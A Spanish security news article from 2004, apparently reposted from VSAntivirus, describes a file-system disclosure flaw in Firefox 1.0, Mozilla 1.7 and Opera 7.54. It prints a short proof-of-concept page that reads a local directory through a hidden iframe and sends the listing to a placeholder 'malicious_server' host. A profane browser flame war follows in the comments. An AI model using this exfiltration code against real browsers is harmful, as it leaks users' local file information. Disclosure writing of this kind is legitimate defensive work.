- Noticias relacionadas
- Otras noticias
Importantes vulnerabilidades en Kerberos 5 del MIT
Una nueva versión del virus Bagle se aprovecha del Mundial de fútbol
Pronósticos de seguridad de cara al próximo año 2008
Microsoft publica dos vulnerabilidades encontradas en Google Chrome
Aumentan los troyanos en la red
Juniper dará a Microsoft software de seguridad para IPTV
MacDefender
"Guillermito" pierde la apelación en el juicio con Tegam
Vulnerabilidades en WhatsApp
Descubren un Facebook falso que robas las contraseñas
- En el foro
Vulnerabilidad en URI del tipo "data:" en Opera
La versión 1.7.5 Mozilla corrige una vulnerabilidad en el protocolo NNTP.jpg)
Ejecución de comandos en Opera-
VULNERABILIDADES
Revelación de información en Mozilla, Firefox y Opera
03 Dec 2004 | VS ANTIVIRUS
La explotación de este fallo, podría revelar información local a un atacante, según informa vsantivirus.
Se ha publicado la siguiente prueba de concepto (PoC):<html>
<body onLoad="
list_files='';
for(i=0;i<local_files.document.links.length;i++)
{list_files+=local_files.document.links.item(i);}
alert(list_files);
//send list_files at malicious_server
document.location.href=
'http://malicious_server/grab.php?list='+list_files;
">
<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>
</body>
</html>Un servidor malicioso puede obtener el contenido del directorio "/home/" (o "c:Document and Setting" en sistemas Windows), y de ese modo tener conocimiento de una serie de archivos de usuario presentes en el sistema.
También podría ser posible conocer si un determinado programa se encuentra en el equipo afectado, con la intención de sacar provecho de ello en un posterior ataque.
De todos modos, esto no puede ser explotado en forma directa por un sitio Web malicioso, ya que la página es abierta desde un camino local (file :/ /localpath/code.htm, donde code.htm es el ejemplo anterior), desde que el iframe "local_files" pertenece a un dominio local.
Con Internet Explorer este código no funciona a nivel local.
Para que un atacante saque provecho de esto, debe hacer que el usuario abra http :/ /maliciuos_server/code.htm, y que el servidor malicioso responda con una página conteniendo un campo "Content-Type" desconocido (por ejemplo "text/html." con un punto al final), para que el navegador muestre una ventana de diálogo con algunas opciones (Abrir, Guardar, Cancelar).
Seleccionando "Abrir" para ver la página, esta será descargada y abierta desde una ubicación local, permitiendo que el código en JavaScript se ejecute en un contexto local (lo mismo ocurrirá si selecciona "Guardar" y luego abre la página).
En Opera, para que funcione este método de explotación remota, debe estar configurado como aplicación por defecto para abrir y guardar archivos.
No existe solución al momento actual, de parte de los vendedores involucrados, quienes han sido avisados el 24 de noviembre pasado, según el autor de este descubrimiento.
Son afectados los siguientes productos:
- Firefox 1.0 (y anteriores)
- Mozilla 1.7 (y anteriores)
- Opera 7.54 (y anteriores)
Referencias:
Disclosure of file system information in Mozilla Firefox and Opera Browser
http://www.securityfocus.com/archive/1/382855 - Boletín
Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.
- Comentarios
- Publicidad
- Ahora en LaFlecha puedes encontrar Cursos y Másters
Yo he dejado de usar Firefox por eso. No quiero que nadie vea mis archivos.
menuda gilipollez, el ie es un coladero continuo de virus, cosa q el firefox no es
El FireFox y Mozilla son los mejores navegadores que tenemos los usuarios, son seguros, rapidos y son creados por un grupo de programadores magnificos, que solo trabajan por el bien de todos!
No son perfectos, eso es claro, ningun ser humano lo es y por consiguiente sus productos tienen errores, pero a diferencia de los de otras compañias, como el maligno IE del innombrable, no se preocupan por arreglar los problemas en sus productos, los de mozilla.org SI.
Por esto deja de decir toterias (para el del primer comentario) que es mejor el software libre y no el propietario!
Por un mundo mejor...
Por todos nosotros...
No use mas productos de Microsoft
Linux pride!
porque no usas MacOS?
MACOS, sistema operativo mas seguro que ninguna de esas piltrafillas de operativos.
EL mejor navegador es IE, esa mierda de firefox en poco tiempo ya tiene varias vulnerabilidades
ADIOSSSSSSS LINUX y TODA SU MIERDA
Peleandoce por pendejadas, para quien dijo el comentario de los parches de windows o ie, hace poco salio una vulnerabilidad en el ie, parecido por el iframe y cosas de esas, y en menos de una semana ya estaba resuelto, y este error tiene elmismo tiempo que salio, y no ha salido el parche
Kien kritica a linuxsin fundamentos deja la clara muestra de que es un pobre fracasado traumado inutil
Amigos, al final da lo mismo si ud. usa IE o Firefox o el navegador que sea, no se trata de abanderizarse por nadie, TODOS los navegadores tienen fortalezas y debilidades, IE fue un pionero y por lo tanto tiene mas experiencia a lo largo de los años, además de poseer un Team de profesionales PAGADOS que independiente del humor con que se despierten tienen que trabajar para microsoft. El recién nacido (publicamente) Firefox está creciendo como todo niño, rápido, dando muchas luces de genialidad, todos lo bajan para verlo, probarlo, hacerle arrumacos al niñito nuevo, a pesar de todo me parece un buen navegador, solo el tiempo dará resultados concretos de consolidación, pero me parece de adolescentes el decir "muera microsoft o muera firefox" ¿que es eso? esperen a que se les seque el ombligo y que se les pase el olor a leche antes de opinar con las hormonas y no con el cerebro.
FIREFOX ES UNA PUTA MIERDA:
1º- Han obligado a los programadores/diseñadores Web a trabajar doble.
Antes sólo eran algunas cosillas pero ahora a cualquier cosa hay que ponerle una mierda de parche chapuza para adaptar el código para que los listos del firefox no vean un desastre de página web.
2º -Los megalistos del firefox dicen: "se trata de saber..."
y digo yo.. ¿saber qué?, se supone que HTML fue diseñado para estandarizar y no para que unos imbeciles de mierda les diese por preferir por ejemplo que: filter:alpha(opacity=100); fuese: opacity:0.9;
por sus cojones, y si tan bueno es, por que no admite filter:alpha(opacity=100); ¿se les olvidó que esto ya estaba implementado en millones de páginas antes de sus versiones chapuza?, lo mismo pasa con los float y aling de los divs, con los bordes de las tablas, cuando una página de body transparente deshabilita pinchar detrás, cuando el listo de mierda se inventa los márgenes interiores, así doscientas cosas.
3º LO MÁS FUERTE: Me propuse preparar una página segun las reglas de firefox y todo se veia vien tanto en firefox como en IE, opera ... pero lo mismo echo para IE se veia destrozado, muy bien!!!
Estos capullos de firefox tratan de trasladar sus incompatibilidades a los diseñadores con dos cojones, pues les digo una cosa... llevo desde el año 93 programando aplicaciones para usuario final y el puto 50% del tiempo te lo empeñas sólo en que si es winX o el otro, o si es service packX o el otro, o si le faltase x libreria o si que su puta madre, todo para intentar que le funcione a todo el mundo, QUE SE APLIQUEN EL CUENTO Y QUE PRUEBEN LAS COSAS COÑO, y no dejen el pastel a los programadores/diseñadores (eso es más facil claro...)
4º y ya no me lio más...
Aliento a la gente del gremio a postear contra el tema para que NO SIGA CADA VEZ A MÁS, si no, vamos a terminar haciendo portales dobles...
Un saludo a la comunidad.